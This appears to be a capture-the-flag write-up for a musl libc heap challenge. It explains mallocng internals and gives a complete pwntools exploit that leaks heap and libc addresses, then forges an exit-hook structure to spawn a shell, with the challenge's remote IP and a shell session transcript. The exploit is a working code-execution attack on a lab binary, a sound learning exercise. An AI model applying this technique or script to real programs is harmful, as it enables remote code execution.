Preface#

Hello This is my first time trying to pwn a heap challenge with musl libc and I will try to explain this detaily as possible, So that it can be used as an reference in the future.

First Look#

At first look I thought, It is a Usual Heap Explotation with the Glibc, But later i Realised It is not.

┌──(hyder㉿xhyder)-[~/unbreakable_26/pwn/chal1/dist]
└─$ file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-x86_64.so.1, not stripped

┌──(hyder㉿xhyder)-[~/unbreakable_26/pwn/chal1/dist]
└─$ file libc.so
libc.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=8210de7c5b1b51b3656531b07280d32b15b00cce, not stripped

┌──(hyder㉿xhyder)-[~/unbreakable_26/pwn/chal1/dist]
└─$ checksec chall
[*] '/home/hyder/unbreakable_26/pwn/chal1/dist/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Then I made the elf to use the musl lib for the challenge.

BUG#

chall.c#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
#include <err.h>
5

6
#ifdef DEBUG
7
#define DPRINT(...) do { \
8
    fprintf(stderr, __VA_ARGS__); \
9
} while(0)
10
#else
11
#define DPRINT(...)
12
#endif
13

14
#define NOTES_SIZE 0x50
15
#define MAX_NOTE_SIZE 0x100
16

17
#define NOTE_ALLOC 1
18
#define NOTE_FREE 2
19
#define NOTE_WRITE 3
20
#define NOTE_READ 4
21
#define NOTE_MAGIC 5
22
#define NOTE_EXIT 6
23

24

25
struct note {
26
    char* data;
27
    size_t size;
28
};
29

30
struct note notes[NOTES_SIZE] = { {NULL, 0} };
31

32
void __attribute__((constructor)) init() {
33
    setvbuf(stdout, NULL, _IONBF, 0);
34
    setvbuf(stderr, NULL, _IONBF, 0);
35
    setvbuf(stdin, NULL, _IONBF, 0);
36
}
37

38
void menu(void) {
39
    puts("1. Allocate note");
40
    puts("2. Free note");
41
    puts("3. Write note");
42
    puts("4. Read note");
43
    puts("5. Exit");
44
    printf("> ");
45
}
46

47
unsigned int get_idx(){
48
    unsigned int idx;
49

50
    printf("index: ");
51

52
    if(scanf("%u", &idx) != 1)
53
        errx(1, "invalid input");
54

55
    if (idx >= NOTES_SIZE)
56
        errx(1, "invalid index");
57

58
    return idx;
59
}
60

61
int main(){
62
    unsigned int idx, sz, choice, magic_used = 0;
63
    unsigned long* ptr;
64
    unsigned long value = 0;
65

66

67
    for(;;){
68
        menu();
69
        if (scanf("%u", &choice) != 1) {
70
            errx(1, "invalid input");
71
        }
72

73
        switch (choice) {
74
            case NOTE_ALLOC:
75
                idx = get_idx();
76
                if (notes[idx].data != NULL) {
77
                    puts("note already allocated");
78
                    break;
79
                }
80

81
                printf("Enter size: ");
82
                if(scanf("%u", &sz) != 1)
83
                    errx(1, "invalid input");
84

85
                if (sz > MAX_NOTE_SIZE) {
86
                    puts("invalid size");
87
                    break;
88
                }
89

90
                notes[idx].data = malloc(sz);
91
                notes[idx].size = sz;
92

93
                DPRINT("malloc: %p\n", notes[idx].data);
94

95
                if (notes[idx].data == NULL)
96
                    errx(1, "failed to allocate memory");
97

98
                break;
99
            case NOTE_FREE:
100
                idx = get_idx();
101

102
                if (notes[idx].data == NULL) {
103
                    puts("note not allocated");
104
                    break;
105
                }
106

107
                free(notes[idx].data);
108
                notes[idx].data = NULL;
109
                notes[idx].size = 0;
110
                break;
111
            case NOTE_WRITE:
112
                idx = get_idx();
113

114
                if(notes[idx].data == NULL) {
115
                    puts("note not allocated");
116
                    break;
117
                }
118

119
                printf("size: ");
120
                if (scanf("%u", &sz) != 1)
121
                    errx(1, "invalid input");
122

123
                if (sz > notes[idx].size) {
124
                    puts("invalid size");
125
                    break;
126
                }
127

128
                printf("data: ");
129
                read(0, notes[idx].data, sz);
130

131
                break;
132
            case NOTE_READ:
133
                idx = get_idx();
134

135
                printf("size: ");
136
                if (scanf("%u", &sz) != 1)
137
                    errx(1, "invalid input");
138

139
                if (sz > MAX_NOTE_SIZE) {
140
                    puts("invalid size");
141
                    break;
142
                }
143

144
                if (notes[idx].data == NULL) {
145
                    puts("note not allocated");
146
                    break;
147
                }
148
                write(1, notes[idx].data, sz);
149

150
                break;
151
            case NOTE_MAGIC:
152
                if(!magic_used)
153
                    magic_used = 1;
154

155
                printf("address: ");
156
                scanf("%p", &ptr);
157

158
                if(((unsigned long)ptr & 7) != 0)
159
                    errx(1, "invalid address");
160

161
                printf("value: ");
162
                scanf("%lu", &value);
163

164
                *ptr = value;
165
                break;
166
            case NOTE_EXIT:
167
                exit(0);
168
            default:
169
                puts("Invalid choice");
170
        }
171
    }
172
    return 0;
173
}

Arbitary read#

This is classic heap implementation with CRUD operation but from looking at the source code, we can see that we can read arbirary amount of size as the size chack here shoud be if (sz > notes[idx].size) instead of if (sz > MAX_NOTE_SIZE) , as even if the malloc size is small , it lets read data from memory upto 0x100, Which we can use to leak memory addresses.

1
case NOTE_READ:
2
    idx = get_idx();
3

4
    printf("size: ");
5
    if (scanf("%u", &sz) != 1)
6
        errx(1, "invalid input");
7

8
    if (sz > MAX_NOTE_SIZE) {
9
        puts("invalid size");
10
        break;
11
    }
12

13
    if (notes[idx].data == NULL) {
14
        puts("note not allocated");
15
        break;
16
    }
17
    write(1, notes[idx].data, sz);
18

19
    break;

Magic function#

Then we have an another unique magic function, that is hidden from the menu of case 5, that lets user to write any data to any memory in the process. This gives us arbitary write to any memory in the program as long as the address is valid and is 8 byte alligned.

1
case NOTE_MAGIC:
2
    if(!magic_used)
3
        magic_used = 1;
4

5
    printf("address: ");
6
    scanf("%p", &ptr);
7

8
    if(((unsigned long)ptr & 7) != 0)
9
        errx(1, "invalid address");
10

11
    printf("value: ");
12
    scanf("%lu", &value);
13

14
    *ptr = value;
15
    break;

Understanding musl heap#

Unlink the GLibc which uses ptmalloc, musl uses mallocng, which is quite different implementation from the Glibc one. Lets see how the interals looks like here,

Slot#

musl stores has the metadata and user data as chunk and in musl that is known as a slot , where we slot has it own corresponding metadata and respective user data. The size of the metadata is 16 bytes , where there are two bytes that are important here which gives us offset and index of the slot here.

pwndbg> x/20gx 0x00007ffff7ffece0-16
0x7ffff7ffecd0: 0x0000555555559158      0x000080000000000e
0x7ffff7ffece0: 0x4141414141414141      0x0000000a41414141
0x7ffff7ffecf0: 0x0000000000000000      0x0002810000000000
0x7ffff7ffed00: 0x4242424242424242      0x00000000000a4242
pwndbg> p/d 0x80 & 31
$1 = 0
pwndbg> p/d 0x81 & 31
$8 = 1
pwndbg>

In here, At that address 0x7ffff7ffecd8, 2nd byte is offset and 3rd byte is index, As max index is 32, so it does idx & 31, to find the index of the slot.

Group#

Then group is noting but the collection of Slots, instead of managing slots individually , it uses group to handle the slots here. then each group has a overall meta data at the start of first slot, as that is used by allocator to keep track the status of the each group in the runtime.

Then allocator uses a formula to track the metadata for each slot in the different position in the memory :
Formula : p - offset * unit , where unit is usually 16 bytes.

1
pwndbg> x/20gx 0x00007ffff7ffece0-16
2
0x7ffff7ffecd0: 0x0000555555559158      0x000080000000000e
3
0x7ffff7ffece0: 0x4141414141414141      0x0000000a41414141
4
0x7ffff7ffecf0: 0x0000000000000000      0x0002810000000000
5
0x7ffff7ffed00: 0x4242424242424242      0x00000000000a4242
6
pwndbg> p/x 0x7ffff7ffed00 - 0x20
7
$13 = 0x7ffff7ffece0
8
pwndbg>  /* as 2 * 16 is 32(0x20) here

This helps the allocator to easily find the metadata of the group for each slot.

meta#

1
struct meta {
2
  struct meta *prev, *next;
3
  struct group *mem;
4
  volatile int avail_mask, freed_mask;
5
  uintptr_t last_idx:5;
6
  uintptr_t freeable:1;
7
  uintptr_t sizeclass:6;
8
  uintptr_t maplen:8*sizeof(uintptr_t)-12;
9
};

The meta struct is the actual control center for that group. It uses bitmap approach to track memory.
struct meta *prev, *next;
* Every meta struct acts as a node in a doubly linked list, and each list exclusively contains meta structs of the exact same size class. so prev and next are used to access the slots in the each group.
struct group *mem;
* A pointer that tells the allocator exactly where the actual memory for this group of slots is located. so simply it tells the metadata for the group.
volatile int avail_mask, freed_mask;
* avail_mask: Bits representing slots that have been reserved by the kernel but never given to a user via malloc().
* freed_mask: Bits representing slots that were used, but have been returned via free().
Then others are not important as of now.

meta_area#

1
struct meta_area {
2
  uint64_t check;
3
  struct meta_area *next;
4
  int nslots;
5
  struct meta slots[];
6
};

It is security check to make sure that the assigned meta is valid and designed to stop attackers from forging fake heap chunks.
So the core function here is that, It drops the last 12 bits(3 bytes) of the meta and check with the ASLR to verify the integrity of the meta used there to find if it is valid.

malloc_context#

It is the global, overarching data structure that oversees everything. Its primary job is to hold an array of pointers to the active meta structs, sorted by their sizeclass. When you ask for memory, the allocator checks __malloc_context first to find the right meta group to pull from.

malloc and free#

When a malloc is invoked, It allocates to corresponding size field with the help of malloc_context that relates to the size field there.
Then when free uses the slot’s offset to securely locate and verify the meta struct, then flips its index bit in freed_mask to mark it available and also overwrites the slot’s offset to 0xff, preventing double-frees.

Leaking the memory#

I felt struck for a while, as we already know we leak memory by arbitary read, but how ???
Then it sparked to me , as we allocate maximum of 0x50 allocation, then we can simply fill the group then a new group is created then we can leak the metadata of that newly created group.

So initially looped to allocated and thought leak from it,

1
for i in range(31):
2
    malloc(i,24)
3
    write(i,24,b'A'*24)
4

5
read(14,100) # 14 allocation to fill the slot
6
p.recv(32) # recv junk
7
leak = u64(p.recv(8).ljust(8,b'\x00'))
8
log.success(f'leak : {hex(leak)}')
9

10
meta_area = leak & ~0xfff
11
log.info(f"Meta Area Base: {hex(meta_area)}")

But wierdly enough, after 15 allocation the group got filled, Still need to look hard what is happening here to understand this benaviour.

now we have a valid heap leak , where it is the meta data in the musl libc, Then I again felt struck that what can i do now, to do a proper exploit i need to have a libc here, we can just use that secret magic to make it happen, but what to write now with only the heap leak.
Then after a long time debuging the metadata memory sections and I managed to overwrite the metadata of the slot address with a arbitary one in the heap, so any future allocation would take place in the heap memory and since heap memory is filled with all the group metadata and the slot addresses we can leak that by arbitary read trick then with the slot address we can calulate the libc address here.

1
malloc(0,24)
2
magic(write_addr2+16,target)
3
malloc(1,24)
4

5
read(1,100)
6
p.recv(16)
7
anon_leak = u64(p.recv(8).ljust(8,b'\x00'))
8
anon_base = anon_leak - 0x28c0
9
log.success(f'anon leak : {hex(anon_leak)}')
10

11
libc_address = anon_leak - 682176
12
log.success(f'libc base : {hex(libc_address)}')

Exploitation#

Since we cannot control return address here , As this program just exits, Then I begun to google for any hooks at the exit, luckly I managed to find a function that triggers at exit to check for any hook and runs it.

1
pwndbg> disass
2
Dump of assembler code for function __funcs_on_exit:
3
=> 0x00007fc625792e79 <+0>:     push   rbp
4
   0x00007fc625792e7a <+1>:     lea    rdi,[rip+0x7815f]        # 0x7fc62580afe0 <lock>
5
   0x00007fc625792e81 <+8>:     push   rbx
6
   0x00007fc625792e82 <+9>:     sub    rsp,0x8
7
   0x00007fc625792e86 <+13>:    call   0x7fc6257b6976 <__lock>
8
   0x00007fc625792e8b <+18>:    mov    rdx,QWORD PTR [rip+0x77f36]        # 0x7fc62580adc8 <head>
9
   0x00007fc625792e92 <+25>:    jmp    0x7fc625792eee <__funcs_on_exit+117>
10
   0x00007fc625792e94 <+27>:    cdqe
11
   0x00007fc625792e96 <+29>:    lea    rdi,[rip+0x78143]        # 0x7fc62580afe0 <lock>
12
   0x00007fc625792e9d <+36>:    mov    rbp,QWORD PTR [rdx+rax*8+0x108]
13
   0x00007fc625792ea5 <+44>:    mov    rbx,QWORD PTR [rdx+rax*8+0x8]
14
   0x00007fc625792eaa <+49>:    call   0x7fc6257b6a27 <__unlock>
15
   0x00007fc625792eaf <+54>:    mov    rdi,rbp
16
   0x00007fc625792eb2 <+57>:    call   rbx
17
   0x00007fc625792eb4 <+59>:    lea    rdi,[rip+0x78125]        # 0x7fc62580afe0 <lock>
18
   0x00007fc625792ebb <+66>:    call   0x7fc6257b6976 <__lock>
19
   0x00007fc625792ec0 <+71>:    mov    rdx,QWORD PTR [rip+0x77f01]        # 0x7fc62580adc8 <head>
20
   0x00007fc625792ec7 <+78>:    mov    ecx,DWORD PTR [rip+0x78117]        # 0x7fc62580afe4 <slot>
21
   0x00007fc625792ecd <+84>:    lea    eax,[rcx-0x1]
22
   0x00007fc625792ed0 <+87>:    mov    DWORD PTR [rip+0x7810e],eax        # 0x7fc62580afe4 <slot>
23
   0x00007fc625792ed6 <+93>:    test   ecx,ecx
24
   0x00007fc625792ed8 <+95>:    jg     0x7fc625792e94 <__funcs_on_exit+27>
25
   0x00007fc625792eda <+97>:    mov    DWORD PTR [rip+0x78100],0x20        # 0x7fc62580afe4 <slot>
26
   0x00007fc625792ee4 <+107>:   mov    rdx,QWORD PTR [rdx]
27
   0x00007fc625792ee7 <+110>:   mov    QWORD PTR [rip+0x77eda],rdx        # 0x7fc62580adc8 <head>
28
   0x00007fc625792eee <+117>:   test   rdx,rdx
29
   0x00007fc625792ef1 <+120>:   jne    0x7fc625792ec7 <__funcs_on_exit+78>
30
   0x00007fc625792ef3 <+122>:   add    rsp,0x8
31
   0x00007fc625792ef7 <+126>:   pop    rbx
32
   0x00007fc625792ef8 <+127>:   pop    rbp
33
   0x00007fc625792ef9 <+128>:   ret
34
End of assembler dump.
35
pwndbg>

This function __funcs_on_exit, check for any exit hooks at the runtime , when exit is triggered.

1
struct fl {
2
    struct fl *next;      // 0x00
3
    void (*f[32])(void*); // 0x08
4
    void *a[32];          // 0x108
5
};

and Roughly this is how that function to hook looks like, So if we can create a structure similar to this.
So with magic function I placed create a structure similar to it.

1
magic(heap_base+0x200,0)
2
magic(heap_base+0x208,system)
3
magic(heap_base+0x200+0x108,binsh)

Then overwritten both the head and slot address there, so that it points to the fake structure that we created and executes it.

1
magic(head,heap_base+0x200) # overwrite head
2
magic(slot-4,4294967296) # overwrte slot to 1 (-4 due to memory allignment)

Thus we can create a working exploit and pwned!!!!

└─$ python solve.py
[*] '/home/hyder/unbreakable_26/pwn/chal1/dist/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
[+] Starting local process '/home/hyder/unbreakable_26/pwn/chal1/dist/chall': pid 114694
[+] leak : 0x560fb4894130
[*] Meta Area Base: 0x560fb4894000
p.sendlineafter(b'address: ',hex(ptr))
[+] anon leak : 0x7fa1064f08c0
[+] libc base : 0x7fa10644a000
[*] Switching to interactive mode
1. Allocate note
2. Free note
3. Write note
4. Read note
5. Exit
> $ ls
chall  chall.c  flag.txt  libc.so  solve.py
$ cat flag.txt
CTF{FAKE_FLAG}
$

Solve.py#

1
from pwn import *
2

3
elf = context.binary = ELF('./chall')
4
context.arch = 'amd64'
5
libc = './libc.so'
6

7
global p
8
'''
9
b*main+348
10
b*main+835
11
b*main+536
12
'''
13
gdbscript = f'''
14
b*main+1215
15
c
16
'''
17
if args.REMOTE:
18
    p = remote('34.89.194.19',31460)
19
elif args.GDB:
20
    p = gdb.debug([elf.path], gdbscript=gdbscript)
21
else:
22
        p = process([elf.path])
23

24
def malloc(idx,size):
25
        p.recvuntil(b'> ')
26
        p.sendline(b'1')
27
        p.sendlineafter(b'index: ',str(idx).encode())
28
        p.sendlineafter(b'Enter size: ',str(size).encode())
29
        return idx
30

31
def free(idx):
32
        p.recvuntil(b'> ')
33
        p.sendline(b'2')
34
        p.sendlineafter(b'index: ',str(idx).encode())
35
        return
36

37
def write(idx,size,data):
38
        p.recvuntil(b'> ')
39
        p.sendline(b'3')
40
        p.sendlineafter(b'index: ',str(idx).encode())
41
        p.sendlineafter(b'size: ',str(size).encode())
42
        p.sendlineafter(b'data: ',data)
43
        return
44

45
def read(idx,size):
46
        p.recvuntil(b'> ')
47
        p.sendline(b'4')
48
        p.sendlineafter(b'index: ',str(idx).encode())
49
        p.sendlineafter(b'size: ',str(size).encode())
50
        return
51

52
def magic(ptr,val):
53
        p.recvuntil(b'> ')
54
        p.sendline(b'5')
55
        p.sendlineafter(b'address: ',hex(ptr))
56
        p.sendlineafter(b'value: ',str(val).encode())
57

58
for i in range(31):
59
    malloc(i,24)
60
    write(i,24,b'A'*24)
61

62
#raw_input('DEBUG')
63

64
read(14,100) # 14 allocation to fill the slot
65

66
p.recv(32) # recv junk
67

68
leak = u64(p.recv(8).ljust(8,b'\x00'))
69
log.success(f'leak : {hex(leak)}')
70

71
meta_area = leak & ~0xfff
72
log.info(f"Meta Area Base: {hex(meta_area)}")
73

74
for i in range(31):
75
    free(i)
76

77
heap_base = leak - 304
78
write_addr = leak + 16
79
target = heap_base + 0xb0
80
write_addr2 = heap_base + 0x158
81
#magic(target-16,p64(0))
82
#magic(target-8,p64(0))
83
magic(write_addr,target)
84
magic(write_addr2+16,target)
85

86
malloc(0,24)
87
magic(write_addr2+16,target)
88
malloc(1,24)
89

90
read(1,100)
91
p.recv(16)
92
anon_leak = u64(p.recv(8).ljust(8,b'\x00'))
93
anon_base = anon_leak - 0x28c0
94
log.success(f'anon leak : {hex(anon_leak)}')
95

96
libc_address = anon_leak - 682176
97
log.success(f'libc base : {hex(libc_address)}')
98

99
system = libc_address + 0x48368
100
environ = anon_base + 0x1da0
101
binsh = libc_address + 0xa0af3
102
head = anon_base + 0x1dc8
103
slot = anon_base + 0x1fe4
104

105
magic(heap_base+0x200,0)
106
magic(heap_base+0x208,system)
107
magic(heap_base+0x200+0x108,binsh)
108

109
magic(head,heap_base+0x200) # overwrite head
110
magic(slot-4,4294967296) # overwrte slot to 1 (-4 due to memory allignment)
111

112
p.sendline(b'6')
113
p.interactive()

Reference#

https://blog.kylebot.net/2021/05/08/DEFCON-2021-Quals-mooosl/ https://github.com/12101111/musl-malloc/tree/rpmalloc